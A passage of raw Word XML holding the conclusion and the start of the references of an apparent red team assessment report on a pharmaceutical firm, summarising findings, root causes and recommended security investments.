          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defer to Phase 2:</w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Network segmentation (£175K) to be implemented in Q2 2026 after foundational controls are operational.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. CONCLUSION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Operation IP Shield successfully demonstrated that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>PharmaTech</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Global's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> current security posture is insufficient to defend against sophisticated threat actors. The complete compromise of the hy</w:t>
      </w:r>
      <w:r w:rsidR="00DF2AC1" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">brid environment within 13 days without detection </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>highlights critical gaps in identity management, endpoint protection, and security monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The engagement followed industry-standard red team methodologies documented in the NIST Special Publication 800-115 Technical Guide to Information Security Testing and Assessment </w:t>
      </w:r>
      <w:r w:rsidR="004139A8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>[89]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and aligned TTPs with the MITRE ATT&amp;CK framework [43].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00DF2AC1" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key Findings Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00DF2AC1" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>- 7 Critical vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> enabling full domain compromise</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00DF2AC1" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- 13-day dwell time </w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">with zero detection (vs. </w:t>
      </w:r>
      <w:r w:rsidR="00372D62" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>industry average of 21 days) [57</w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00DF2AC1" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">£85MB </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>confidential data exfiltration</w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> undetected</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00DF2AC1" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Supply chain risk</w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> via CI/CD pipeline compromise</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00DF2AC1" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Cloud misconfiguration</w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> exposing patient health information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00DF2AC1" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Root Cause Analysis:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The primary security failures were not due to sophisticated zero-day exploits but rather the absence of foundational security controls mandated by frameworks including NIST CSF, CIS Controls v8, and ISO 27001 </w:t>
      </w:r>
      <w:r w:rsidR="004139A8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>[85]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004139A8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>[86]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004139A8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>[90]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Strategic Recommendations Implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The strategic investments recommended above will transform </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>PharmaTech's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> security maturity fr</w:t>
      </w:r>
      <w:r w:rsidR="00DF2AC1" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>om reactive to proactive</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, reducing organizational risk by approximately 85% while ensuring regulatory compliance and protecting £250M+ in intellectual property </w:t>
      </w:r>
      <w:r w:rsidR="00807452" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>[81]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Organizations implementing comprehensive security control frameworks experience:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- 74% reduction in breach costs </w:t>
      </w:r>
      <w:r w:rsidR="00807452" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>[81]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- 54% faster incident response times </w:t>
      </w:r>
      <w:r w:rsidR="00372D62" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>[59]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- 80% reduction in successful phishing attacks </w:t>
      </w:r>
      <w:r w:rsidR="004139A8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>[82]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- 90% prevention of credential-based attacks </w:t>
      </w:r>
      <w:r w:rsidR="00372D62" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>[62]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Immediate action required to prevent real-world breach.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00753C79" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>This assessment demonstrates that cybersecurity investments deliver measurable ROI exceeding 19:1 while protecting critical assets and ensuring business continuity in an increasingly hostile threat landscape.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00A13DDC" w:rsidP="00A13DDC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0033774F" w:rsidRPr="00C57BFC" w:rsidRDefault="0033774F" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="173" w:afterAutospacing="0"/>
        <w:ind w:left="3600" w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004031B7" w:rsidRPr="00C57BFC" w:rsidRDefault="004031B7" w:rsidP="004031B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003468ED" w:rsidRPr="00C57BFC" w:rsidRDefault="004031B7" w:rsidP="003468ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidR="003468ED" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">A. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003468ED" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kharraz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003468ED" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> et al., "Knowing the ransomware and building defense against it - specific to </w:t>
      </w:r>
      <w:r w:rsidR="003468ED" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">      healthcare institutes," 2017 International Conference on Computing, Networking and </w:t>
      </w:r>
      <w:r w:rsidR="003468ED" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">      Communications (ICNC), Santa Clara, CA, USA, 2017.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A72A8" w:rsidRPr="00C57BFC" w:rsidRDefault="006A72A8" w:rsidP="003468ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
